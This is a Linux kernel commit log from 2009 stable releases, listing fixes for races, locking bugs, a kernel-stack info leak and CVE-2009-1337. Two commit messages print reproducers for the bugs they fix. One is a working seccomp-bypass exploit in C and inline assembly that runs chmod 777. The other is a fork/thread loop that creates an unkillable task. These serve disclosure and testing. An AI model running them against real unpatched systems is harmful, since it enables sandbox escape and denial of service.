summaryrefslogtreecommitdiff
path: root/kernel
AgeCommit message (Collapse)Author
2009-09-08kthreads: fix kthread_create() vs kthread_stop() raceOleg Nesterov
The bug should be "accidently" fixed by recent changes in 2.6.31, all kernels <= 2.6.30 need the fix. The problem was never noticed before, it was found because it causes mysterious failures with GFS mount/umount. Credits to Robert Peterson. He blaimed kthread.c from the very beginning. But, despite my promise, I forgot to inspect the old implementation until he did a lot of testing and reminded me. This led to huge delay in fixing this bug. kthread_stop() does put_task_struct(k) before it clears kthread_stop_info.k. This means another kthread_create() can re-use this task_struct, but the new kthread can still see kthread_should_stop() == T and exit even without calling threadfn(). Reported-by: Robert Peterson <rpeterso@redhat.com> Tested-by: Robert Peterson <rpeterso@redhat.com> Signed-off-by: Oleg Nesterov <oleg@redhat.com> Acked-by: Rusty Russell <rusty@rustcorp.com.au> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-09-08do_sigaltstack: avoid copying 'stack_t' as a structure to user spaceLinus Torvalds
commit 0083fc2c50e6c5127c2802ad323adf8143ab7856 upstream. Ulrich Drepper correctly points out that there is generally padding in the structure on 64-bit hosts, and that copying the structure from kernel to user space can leak information from the kernel stack in those padding bytes. Avoid the whole issue by just copying the three members one by one instead, which also means that the function also can avoid the need for a stack frame. This also happens to match how we copy the new structure from user space, so it all even makes sense. [ The obvious solution of adding a memset() generates horrid code, gcc does really stupid things. ] Reported-by: Ulrich Drepper <drepper@redhat.com> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-09-08clone(): fix race between copy_process() and de_thread()Oleg Nesterov
commit 4ab6c08336535f8c8e42cf45d7adeda882eff06e upstream. Spotted by Hiroshi Shimamoto who also provided the test-case below. copy_process() uses signal->count as a reference counter, but it is not. This test case #include <sys/types.h> #include <sys/wait.h> #include <unistd.h> #include <stdio.h> #include <errno.h> #include <pthread.h> void *null_thread(void *p) { for (;;) sleep(1); return NULL; } void *exec_thread(void *p) { execl("/bin/true", "/bin/true", NULL); return null_thread(p); } int main(int argc, char **argv) { for (;;) { pid_t pid; int ret, status; pid = fork(); if (pid < 0) break; if (!pid) { pthread_t tid; pthread_create(&tid, NULL, exec_thread, NULL); for (;;) pthread_create(&tid, NULL, null_thread, NULL); } do { ret = waitpid(pid, &status, 0); } while (ret == -1 && errno == EINTR); } return 0; } quickly creates an unkillable task. If copy_process(CLONE_THREAD) races with de_thread() copy_signal()->atomic(signal->count) breaks the signal->notify_count logic, and the execing thread can hang forever in kernel space. Change copy_process() to increment count/live only when we know for sure we can't fail. In this case the forked thread will take care of its reference to signal correctly. If copy_process() fails, check CLONE_THREAD flag. If it it set - do nothing, the counters were not changed and current belongs to the same thread group. If it is not set, ->signal must be released in any case (and ->count must be == 1), the forked child is the only thread in the thread group. We need more cleanups here, in particular signal->count should not be used by de_thread/__exit_signal at all. This patch only fixes the bug. Reported-by: Hiroshi Shimamoto <h-shimamoto@ct.jp.nec.com> Tested-by: Hiroshi Shimamoto <h-shimamoto@ct.jp.nec.com> Signed-off-by: Oleg Nesterov <oleg@redhat.com> Acked-by: Roland McGrath <roland@redhat.com> Cc: KAMEZAWA Hiroyuki <kamezawa.hiroyu@jp.fujitsu.com> Signed-off-by: Andrew Morton <akpm@linux-foundation.org> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-08-16execve: must clear current->clear_child_tidEric Dumazet
commit 9c8a8228d0827e0d91d28527209988f672f97d28 upstream. While looking at Jens Rosenboom bug report (http://lkml.org/lkml/2009/7/27/35) about strange sys_futex call done from a dying "ps" program, we found following problem. clone() syscall has special support for TID of created threads. This support includes two features. One (CLONE_CHILD_SETTID) is to set an integer into user memory with the TID value. One (CLONE_CHILD_CLEARTID) is to clear this same integer once the created thread dies. The integer location is a user provided pointer, provided at clone() time. kernel keeps this pointer value into current->clear_child_tid. At execve() time, we should make sure kernel doesnt keep this user provided pointer, as full user memory is replaced by a new one. As glibc fork() actually uses clone() syscall with CLONE_CHILD_SETTID and CLONE_CHILD_CLEARTID set, chances are high that we might corrupt user memory in forked processes. Following sequence could happen: 1) bash (or any program) starts a new process, by a fork() call that glibc maps to a clone( ... CLONE_CHILD_SETTID | CLONE_CHILD_CLEARTID ...) syscall 2) When new process starts, its current->clear_child_tid is set to a location that has a meaning only in bash (or initial program) context (&THREAD_SELF->tid) 3) This new process does the execve() syscall to start a new program. current->clear_child_tid is left unchanged (a non NULL value) 4) If this new program creates some threads, and initial thread exits, kernel will attempt to clear the integer pointed by current->clear_child_tid from mm_release() : if (tsk->clear_child_tid && !(tsk->flags & PF_SIGNALED) && atomic_read(&mm->mm_users) > 1) { u32 __user * tidptr = tsk->clear_child_tid; tsk->clear_child_tid = NULL; /* * We don't check the error code - if userspace has * not set up a proper pointer then tough luck. */ << here >> put_user(0, tidptr); sys_futex(tidptr, FUTEX_WAKE, 1, NULL, NULL, 0); } 5) OR : if new program is not multi-threaded, but spied by /proc/pid users (ps command for example), mm_users > 1, and the exiting program could corrupt 4 bytes in a persistent memory area (shm or memory mapped file) If current->clear_child_tid points to a writeable portion of memory of the new program, kernel happily and silently corrupts 4 bytes of memory, with unexpected effects. Fix is straightforward and should not break any sane program. Reported-by: Jens Rosenboom <jens@mcbone.net> Acked-by: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com> Signed-off-by: Oleg Nesterov <oleg@redhat.com> Cc: Peter Zijlstra <peterz@infradead.org> Cc: Sonny Rao <sonnyrao@us.ibm.com> Cc: Ingo Molnar <mingo@elte.hu> Cc: Thomas Gleixner <tglx@linutronix.de> Cc: Ulrich Drepper <drepper@redhat.com> Cc: Oleg Nesterov <oleg@redhat.com> Signed-off-by: Andrew Morton <akpm@linux-foundation.org> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-07-19kernel/resource.c: fix sign extension in reserve_setup()Zhang Rui
commit 8bc1ad7dd301b7ca7454013519fa92e8c53655ff upstream. When the 32-bit signed quantities get assigned to the u64 resource_size_t, they are incorrectly sign-extended. Addresses http://bugzilla.kernel.org/show_bug.cgi?id=13253 Addresses http://bugzilla.kernel.org/show_bug.cgi?id=9905 Signed-off-by: Zhang Rui <rui.zhang@intel.com> Reported-by: Leann Ogasawara <leann@ubuntu.com> Cc: Pierre Ossman <drzeus@drzeus.cx> Reported-by: <pablomme@googlemail.com> Tested-by: <pablomme@googlemail.com> Cc: Jesse Barnes <jbarnes@virtuousgeek.org> Signed-off-by: Andrew Morton <akpm@linux-foundation.org> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-07-19security: use mmap_min_addr indepedently of security modelsChristoph Lameter
commit e0a94c2a63f2644826069044649669b5e7ca75d3 upstream. This patch removes the dependency of mmap_min_addr on CONFIG_SECURITY. It also sets a default mmap_min_addr of 4096. mmapping of addresses below 4096 will only be possible for processes with CAP_SYS_RAWIO. Signed-off-by: Christoph Lameter <cl@linux-foundation.org> Acked-by: Eric Paris <eparis@redhat.com> Looks-ok-by: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: James Morris <jmorris@namei.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-07-02bsdacct: fix access to invalid filp in acct_on()Renaud Lottiaux
commit df279ca8966c3de83105428e3391ab17690802a9 upstream. The file opened in acct_on and freshly stored in the ns->bacct struct can be closed in acct_file_reopen by a concurrent call after we release acct_lock and before we call mntput(file->f_path.mnt). Record file->f_path.mnt in a local variable and use this variable only. Signed-off-by: Renaud Lottiaux <renaud.lottiaux@kerlabs.com> Signed-off-by: Louis Rilling <louis.rilling@kerlabs.com> Cc: Al Viro <viro@zeniv.linux.org.uk> Signed-off-by: Andrew Morton <akpm@linux-foundation.org> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-08clockevents: prevent endless loop in tick_handle_periodic()john stultz
commit 74a03b69d1b5ce00a568e142ca97e76b7f5239c6 upstream. tick_handle_periodic() can lock up hard when a one shot clock event device is used in combination with jiffies clocksource. Avoid an endless loop issue by requiring that a highres valid clocksource be installed before we call tick_periodic() in a loop when using ONESHOT mode. The result is we will only increment jiffies once per interrupt until a continuous hardware clocksource is available. Without this, we can run into a endless loop, where each cycle through the loop, jiffies is updated which increments time by tick_period or more (due to clock steering), which can cause the event programming to think the next event was before the newly incremented time and fail causing tick_periodic() to be called again and the whole process loops forever. [ Impact: prevent hard lock up ] Signed-off-by: John Stultz <johnstul@us.ibm.com> Signed-off-by: Andrew Morton <akpm@linux-foundation.org> Signed-off-by: Thomas Gleixner <tglx@linutronix.de> Cc: stable@kernel.org Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-02fix ptrace slownessMiklos Szeredi
commit 53da1d9456fe7f87a920a78fdbdcf1225d197cb7 upstream. This patch fixes bug #12208: Bug-Entry : http://bugzilla.kernel.org/show_bug.cgi?id=12208 Subject : uml is very slow on 2.6.28 host This turned out to be not a scheduler regression, but an already existing problem in ptrace being triggered by subtle scheduler changes. The problem is this: - task A is ptracing task B - task B stops on a trace event - task A is woken up and preempts task B - task A calls ptrace on task B, which does ptrace_check_attach() - this calls wait_task_inactive(), which sees that task B is still on the runq - task A goes to sleep for a jiffy - ... Since UML does lots of the above sequences, those jiffies quickly add up to make it slow as hell. This patch solves this by not rescheduling in read_unlock() after ptrace_stop() has woken up the tracer. Thanks to Oleg Nesterov and Ingo Molnar for the feedback. Signed-off-by: Miklos Szeredi <mszeredi@suse.cz> CC: stable@kernel.org Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-02exit_notify: kill the wrong capable(CAP_KILL) check (CVE-2009-1337)Oleg Nesterov
CVE-2009-1337 commit 432870dab85a2f69dc417022646cb9a70acf7f94 upstream. The CAP_KILL check in exit_notify() looks just wrong, kill it. Whatever logic we have to reset ->exit_signal, the malicious user can bypass it if it execs the setuid application before exiting. Signed-off-by: Oleg Nesterov <oleg@redhat.com> Acked-by: Serge Hallyn <serue@us.ibm.com> Acked-by: Roland McGrath <roland@redhat.com> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-05-02kprobes: Fix locking imbalance in kretprobesAnanth N Mavinakayanahalli
commit f02b8624fedca39886b0eef770dca70c2f0749b3 upstream. Fix locking imbalance in kretprobes: ===================================== [ BUG: bad unlock balance detected! ] ------------------------------------- kthreadd/2 is trying to release lock (&rp->lock) at: [<c06b3080>] pre_handler_kretprobe+0xea/0xf4 but there are no more locks to release! other info that might help us debug this: 1 lock held by kthreadd/2: #0: (rcu_read_lock){..--}, at: [<c06b2b24>] __atomic_notifier_call_chain+0x0/0x5a stack backtrace: Pid: 2, comm: kthreadd Not tainted 2.6.29-rc8 #1 Call Trace: [<c06ae498>] ? printk+0xf/0x17 [<c06b3080>] ? pre_handler_kretprobe+0xea/0xf4 [<c044ce6c>] print_unlock_inbalance_bug+0xc3/0xce [<c0444d4b>] ? clocksource_read+0x7/0xa [<c04450a4>] ? getnstimeofday+0x5f/0xf6 [<c044a9ca>] ? register_lock_class+0x17/0x293 [<c044b72c>] ? mark_lock+0x1e/0x30b [<c0448956>] ? tick_dev_program_event+0x4a/0xbc [<c0498100>] ? __slab_alloc+0xa5/0x415 [<c06b2fbe>] ? pre_handler_kretprobe+0x28/0xf4 [<c06b3080>] ? pre_handler_kretprobe+0xea/0xf4 [<c044cf1b>] lock_release_non_nested+0xa4/0x1a5 [<c06b3080>] ? pre_handler_kretprobe+0xea/0xf4 [<c044d15d>] lock_release+0x141/0x166 [<c06b07dd>] _spin_unlock_irqrestore+0x19/0x50 [<c06b3080>] pre_handler_kretprobe+0xea/0xf4 [<c06b20b5>] kprobe_exceptions_notify+0x1c9/0x43e [<c06b2b02>] notifier_call_chain+0x26/0x48 [<c06b2b5b>] __atomic_notifier_call_chain+0x37/0x5a [<c06b2b24>] ? __atomic_notifier_call_chain+0x0/0x5a [<c06b2b8a>] atomic_notifier_call_chain+0xc/0xe [<c0442d0d>] notify_die+0x2d/0x2f [<c06b0f9c>] do_int3+0x1f/0x71 [<c06b0e84>] int3+0x2c/0x34 [<c042d476>] ? do_fork+0x1/0x288 [<c040221b>] ? kernel_thread+0x71/0x79 [<c043ed1b>] ? kthread+0x0/0x60 [<c043ed1b>] ? kthread+0x0/0x60 [<c04040b8>] ? kernel_thread_helper+0x0/0x10 [<c043ec7f>] kthreadd+0xac/0x148 [<c043ebd3>] ? kthreadd+0x0/0x148 [<c04040bf>] kernel_thread_helper+0x7/0x10 Signed-off-by: Ananth N Mavinakayanahalli <ananth@in.ibm.com> Tested-by: Bharata B Rao <bharata@linux.vnet.ibm.com> Cc: Masami Hiramatsu <mhiramat@redhat.com> Cc: Jim Keniston <jkenisto@us.ibm.com> Cc: Linus Torvalds <torvalds@linux-foundation.org> Cc: Andrew Morton <akpm@linux-foundation.org> LKML-Reference: <20090318113621.GB4129@in.ibm.com> Signed-off-by: Ingo Molnar <mingo@elte.hu> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16x86-64: seccomp: fix 32/64 syscall holeRoland McGrath
commit 5b1017404aea6d2e552e991b3fd814d839e9cd67 upstream. On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with ljmp, and then use the "syscall" instruction to make a 64-bit system call. A 64-bit process make a 32-bit system call with int $0x80. In both these cases under CONFIG_SECCOMP=y, secure_computing() will use the wrong system call number table. The fix is simple: test TS_COMPAT instead of TIF_IA32. Here is an example exploit: /* test case for seccomp circumvention on x86-64 There are two failure modes: compile with -m64 or compile with -m32. The -m64 case is the worst one, because it does "chmod 777 ." (could be any chmod call). The -m32 case demonstrates it was able to do stat(), which can glean information but not harm anything directly. A buggy kernel will let the test do something, print, and exit 1; a fixed kernel will make it exit with SIGKILL before it does anything. */ #define _GNU_SOURCE #include <assert.h> #include <inttypes.h> #include <stdio.h> #include <linux/prctl.h> #include <sys/stat.h> #include <unistd.h> #include <asm/unistd.h> int main (int argc, char **argv) { char buf[100]; static const char dot[] = "."; long ret; unsigned st[24]; if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0) perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?"); #ifdef __x86_64__ assert ((uintptr_t) dot < (1UL << 32)); asm ("int $0x80 # %0 <- %1(%2 %3)" : "=a" (ret) : "0" (15), "b" (dot), "c" (0777)); ret = snprintf (buf, sizeof buf, "result %ld (check mode on .!)\n", ret); #elif defined __i386__ asm (".code32\n" "pushl %%cs\n" "pushl $2f\n" "ljmpl $0x33, $1f\n" ".code64\n" "1: syscall # %0 <- %1(%2 %3)\n" "lretl\n" ".code32\n" "2:" : "=a" (ret) : "0" (4), "D" (dot), "S" (&st)); if (ret == 0) ret = snprintf (buf, sizeof buf, "stat . -> st_uid=%u\n", st[7]); else ret = snprintf (buf, sizeof buf, "result %ld\n", ret); #else # error "not this one" #endif write (1, buf, ret); syscall (__NR_exit, 1); return 2; } Signed-off-by: Roland McGrath <roland@redhat.com> [ I don't know if anybody actually uses seccomp, but it's enabled in at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ] Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16Fix fixpoint divide exception in acct_update_integralsHeiko Carstens
commit 6d5b5acca9e566515ef3f1ed617e7295c4f94345 upstream. Frans Pop reported the crash below when running an s390 kernel under Hercules: Kernel BUG at 000738b4 verbose debug info unavailable! fixpoint divide exception: 0009 #1! SMP Modules linked in: nfs lockd nfs_acl sunrpc ctcm fsm tape_34xx cu3088 tape ccwgroup tape_class ext3 jbd mbcache dm_mirror dm_log dm_snapshot dm_mod dasd_eckd_mod dasd_mod CPU: 0 Not tainted 2.6.27.19 #13 Process awk (pid: 2069, task: 0f9ed9b8, ksp: 0f4f7d18) Krnl PSW : 070c1000 800738b4 (acct_update_integrals+0x4c/0x118) R:0 T:1 IO:1 EX:1 Key:0 M:1 W:0 P:0 AS:0 CC:1 PM:0 Krnl GPRS: 00000000 000007d0 7fffffff fffff830 00000000 ffffffff 00000002 0f9ed9b8 00000000 00008ca0 00000000 0f9ed9b8 0f9edda4 8007386e 0f4f7ec8 0f4f7e98 Krnl Code: 800738aa: a71807d0 lhi %r1,2000 800738ae: 8c200001 srdl %r2,1 800738b2: 1d21 dr %r2,%r1 >800738b4: 5810d10e l %r1,270(%r13) 800738b8: 1823 lr %r2,%r3 800738ba: 4130f060 la %r3,96(%r15) 800738be: 0de1 basr %r14,%r1 800738c0: 5800f060 l %r0,96(%r15) Call Trace: ( <000000000004fdea>! blocking_notifier_call_chain+0x1e/0x2c) <0000000000038502>! do_exit+0x106/0x7c0 <0000000000038c36>! do_group_exit+0x7a/0xb4 <0000000000038c8e>! SyS_exit_group+0x1e/0x30 <0000000000021c28>! sysc_do_restart+0x12/0x16 <0000000077e7e924>! 0x77e7e924 Reason for this is that cpu time accounting usually only happens from interrupt context, but acct_update_integrals gets also called from process context with interrupts enabled. So in acct_update_integrals we may end up with the following scenario: Between reading tsk->stime/tsk->utime and tsk->acct_timexpd an interrupt happens which updates accouting values. This causes acct_timexpd to be greater than the former stime + utime. The subsequent calculation of dtime = cputime_sub(time, tsk->acct_timexpd); will be negative and the division performed by cputime_to_jiffies(dtime) will generate an exception since the result won't fit into a 32 bit register. In order to fix this just always disable interrupts while accessing any of the accounting values. Reported by: Frans Pop <elendil@planet.nl> Tested by: Frans Pop <elendil@planet.nl> Cc: Martin Schwidefsky <schwidefsky@de.ibm.com> Signed-off-by: Heiko Carstens <heiko.carstens@de.ibm.com> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-03-16copy_process: fix CLONE_PARENT && parent_exec_id interactionOleg Nesterov
commit 2d5516cbb9daf7d0e342a2e3b0fc6f8c39a81205 upstream. CLONE_PARENT can fool the ->self_exec_id/parent_exec_id logic. If we re-use the old parent, we must also re-use ->parent_exec_id to make sure exit_notify() sees the right ->xxx_exec_id's when the CLONE_PARENT'ed task exits. Also, move down the "p->parent_exec_id = p->self_exec_id" thing, to place two different cases together. Signed-off-by: Oleg Nesterov <oleg@redhat.com> Cc: Roland McGrath <roland@redhat.com> Cc: Andrew Morton <akpm@linux-foundation.org> Cc: David Howells <dhowells@redhat.com> Cc: Serge E. Hallyn <serge@hallyn.com> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-02-12genirq: NULL struct irq_desc's member 'name' in dynamic_irq_cleanup()Dean Nelson
commit b6f3b7803a9231eddc36d0a2a6d2d8105ef89344 upstream. If the member 'name' of the irq_desc structure happens to point to a character string that is resident within a kernel module, problems ensue if that module is rmmod'd (at which time dynamic_irq_cleanup() is called) and then later show_interrupts() is called by someone. It is also not a good thing if the character string resided in kmalloc'd space that has been kfree'd (after having called dynamic_irq_cleanup()). dynamic_irq_cleanup() fails to NULL the 'name' member and show_interrupts() references it on a few architectures (like h8300, sh and x86). Signed-off-by: Dean Nelson <dcn@sgi.com> Signed-off-by: Ingo Molnar <mingo@elte.hu> Signed-off-by: Andrew Morton <akpm@linux-foundation.org> Signed-off-by: Ingo Molnar <mingo@elte.hu> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-02-12wait: prevent exclusive waiter starvationJohannes Weiner
commit 777c6c5f1f6e757ae49ecca2ed72d6b1f523c007 upstream. With exclusive waiters, every process woken up through the wait queue must ensure that the next waiter down the line is woken when it has finished. Interruptible waiters don't do that when aborting due to a signal. And if an aborting waiter is concurrently woken up through the waitqueue, noone will ever wake up the next waiter. This has been observed with __wait_on_bit_lock() used by lock_page_killable(): the first contender on the queue was aborting when the actual lock holder woke it up concurrently. The aborted contender didn't acquire the lock and therefor never did an unlock followed by waking up the next waiter. Add abort_exclusive_wait() which removes the process' wait descriptor from the waitqueue, iff still queued, or wakes up the next waiter otherwise. It does so under the waitqueue lock. Racing with a wake up means the aborting process is either already woken (removed from the queue) and will wake up the next waiter, or it will remove itself from the queue and the concurrent wake up will apply to the next waiter after it. Use abort_exclusive_wait() in __wait_event_interruptible_exclusive() and __wait_on_bit_lock() when they were interrupted by other means than a wake up through the queue. [akpm@linux-foundation.org: coding-style fixes] Reported-by: Chris Mason <chris.mason@oracle.com> Signed-off-by: Johannes Weiner <hannes@cmpxchg.org> Mentored-by: Oleg Nesterov <oleg@redhat.com> Cc: Peter Zijlstra <a.p.zijlstra@chello.nl> Cc: Matthew Wilcox <matthew@wil.cx> Cc: Chuck Lever <cel@citi.umich.edu> Cc: Nick Piggin <nickpiggin@yahoo.com.au> Cc: Ingo Molnar <mingo@elte.hu> Signed-off-by: Andrew Morton <akpm@linux-foundation.org> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-02-02relay: fix lock imbalance in relay_late_setup_filesJiri Slaby
commit b786c6a98ef6fa81114ba7b9fbfc0d67060775e3 upstream. One fail path in relay_late_setup_files() omits mutex_unlock(&relay_channels_mutex); Add it. Signed-off-by: Jiri Slaby <jirislaby@gmail.com> Signed-off-by: Ingo Molnar <mingo@elte.hu> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-01-24clocksource: introduce clocksource_forward_now()Roman Zippel
commit 9a055117d3d9cb562f83f8d4cd88772761f4cab0 upstream. To keep the raw monotonic patch simple first introduce clocksource_forward_now(), which takes care of the offset since the last update_wall_time() call and adds it to the clock, so there is no need anymore to deal with it explicitly at various places, which need to make significant changes to the clock. This is also gets rid of the timekeeping_suspend_nsecs, instead of waiting until resume, the value is accumulated during suspend. In the end there is only a single user of __get_nsec_offset() left, so I integrated it back to getnstimeofday(). Signed-off-by: Roman Zippel <zippel@linux-m68k.org> Signed-off-by: Andrew Morton <akpm@linux-foundation.org> Signed-off-by: Ingo Molnar <mingo@elte.hu> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-01-24'kill sig -1' must only apply to caller's namespaceSukadev Bhattiprolu
commit d25141a818383b3c3b09f065698c544a7a0ec6e7 upstream. Currently "kill <sig> -1" kills processes in all namespaces and breaks the isolation of namespaces. Earlier attempt to fix this was discussed at: http://lkml.org/lkml/2008/7/23/148 As suggested by Oleg Nesterov in that thread, use "task_pid_vnr() > 1" check since task_pid_vnr() returns 0 if process is outside the caller's namespace. Signed-off-by: Sukadev Bhattiprolu <sukadev@linux.vnet.ibm.com> Acked-by: Eric W. Biederman <ebiederm@xmission.com> Tested-by: Daniel Hokka Zakrisson <daniel@hozac.com> Signed-off-by: Oleg Nesterov <oleg@redhat.com> Signed-off-by: Andrew Morton <akpm@linux-foundation.org> Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-01-18System call wrappers part 32Heiko Carstens
commit d4e82042c4cfa87a7d51710b71f568fe80132551 upstream. Signed-off-by: Heiko Carstens <heiko.carstens@de.ibm.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-01-18System call wrappers part 31Heiko Carstens
commit 836f92adf121f806e9beb5b6b88bd5c9c4ea3f24 upstream. Signed-off-by: Heiko Carstens <heiko.carstens@de.ibm.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-01-18System call wrappers part 30Heiko Carstens
commit 6559eed8ca7db0531a207cd80be5e28cd6f213c5 upstream. Signed-off-by: Heiko Carstens <heiko.carstens@de.ibm.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-01-18System call wrappers part 27Heiko Carstens
commit 1e7bfb2134dfec37ce04fb3a4ca89299e892d10c upstream. Signed-off-by: Heiko Carstens <heiko.carstens@de.ibm.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-01-18System call wrappers part 26Heiko Carstens
commit c4ea37c26a691ad0b7e86aa5884aab27830e95c9 upstream. Signed-off-by: Heiko Carstens <heiko.carstens@de.ibm.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-01-18System call wrappers part 24Heiko Carstens
commit e48fbb699f82ef1e80bd7126046394d2dc9ca7e6 upstream. Signed-off-by: Heiko Carstens <heiko.carstens@de.ibm.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-01-18System call wrappers part 23Heiko Carstens
commit 5a8a82b1d306a325d899b67715618413657efda4 upstream. Signed-off-by: Heiko Carstens <heiko.carstens@de.ibm.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-01-18System call wrappers part 19Heiko Carstens
commit 003d7ab479168132a2b2c6700fe682b08f08ab0c upstream. Signed-off-by: Heiko Carstens <heiko.carstens@de.ibm.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-01-18System call wrappers part 18Heiko Carstens
commit a6b42e83f249aad723589b2bdf6d1dfb2b0997c8 upstream. Signed-off-by: Heiko Carstens <heiko.carstens@de.ibm.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-01-18System call wrappers part 17Heiko Carstens
commit ca013e945b1ba5828b151ee646946f1297b67a4c upstream. Signed-off-by: Heiko Carstens <heiko.carstens@de.ibm.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-01-18System call wrappers part 09Heiko Carstens
commit a5f8fa9e9ba5ef3305e147f41ad6e1e84ac1f0bd upstream. Signed-off-by: Heiko Carstens <heiko.carstens@de.ibm.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-01-18System call wrappers part 08Heiko Carstens
commit 17da2bd90abf428523de0fb98f7075e00e3ed42e upstream. Signed-off-by: Heiko Carstens <heiko.carstens@de.ibm.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-01-18System call wrappers part 07Heiko Carstens
commit 754fe8d297bfae7b77f7ce866e2fb0c5fb186506 upstream. Signed-off-by: Heiko Carstens <heiko.carstens@de.ibm.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-01-18System call wrappers part 06Heiko Carstens
commit 5add95d4f7cf08f6f62510f19576992912387501 upstream. Signed-off-by: Heiko Carstens <heiko.carstens@de.ibm.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-01-18System call wrappers part 05Heiko Carstens
commit 362e9c07c7220c0a78c88826fc0d2bf7e4a4bb68 upstream. Signed-off-by: Heiko Carstens <heiko.carstens@de.ibm.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-01-18System call wrappers part 04Heiko Carstens
commit b290ebe2c46d01b742b948ce03f09e8a3efb9a92 upstream. Signed-off-by: Heiko Carstens <heiko.carstens@de.ibm.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-01-18System call wrappers part 03Heiko Carstens
commit ae1251ab785f6da87219df8352ffdac68bba23e4 upstream. Signed-off-by: Heiko Carstens <heiko.carstens@de.ibm.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-01-18System call wrappers part 02Heiko Carstens
commit dbf040d9d1cbf1ef6250bdb095c5c118950bcde8 upstream. Signed-off-by: Heiko Carstens <heiko.carstens@de.ibm.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-01-18System call wrappers part 01Heiko Carstens
commit 58fd3aa288939d3097fa04505b25c2f5e6e144d1 upstream. Signed-off-by: Heiko Carstens <heiko.carstens@de.ibm.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-01-18Make sys_syslog a conditional system callHeiko Carstens
commit f627a741d24f12955fa2d9f8831c3b12860635bd upstream. Remove the -ENOSYS implementation for !CONFIG_PRINTK and use the cond_syscall infrastructure instead. Acked-by: Kyle McMartin <kyle@redhat.com> Signed-off-by: Heiko Carstens <heiko.carstens@de.ibm.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-01-18Convert all system calls to return a longHeiko Carstens
commit 2ed7c03ec17779afb4fcfa3b8c61df61bd4879ba upstream. Convert all system calls to return a long. This should be a NOP since all converted types should have the same size anyway. With the exception of sys_exit_group which returned void. But that doesn't matter since the system call doesn't return. Signed-off-by: Heiko Carstens <heiko.carstens@de.ibm.com> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-01-18sched_clock: prevent scd->clock from moving backwards, take #2Thomas Gleixner
commit 1c5745aa380efb6417b5681104b007c8612fb496 upstream. Redo: 5b7dba4: sched_clock: prevent scd->clock from moving backwards which had to be reverted due to s2ram hangs: ca7e716: Revert "sched_clock: prevent scd->clock from moving backwards" ... this time with resume restoring GTOD later in the sequence taken into account as well. The "timekeeping_suspended" flag is not very nice but we cannot call into GTOD before it has been properly resumed and the scheduler will run very early in the resume sequence. Signed-off-by: Ingo Molnar <mingo@elte.hu> Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
2009-01-18cgroups: fix a race between cgroup_clone and umountLi Zefan
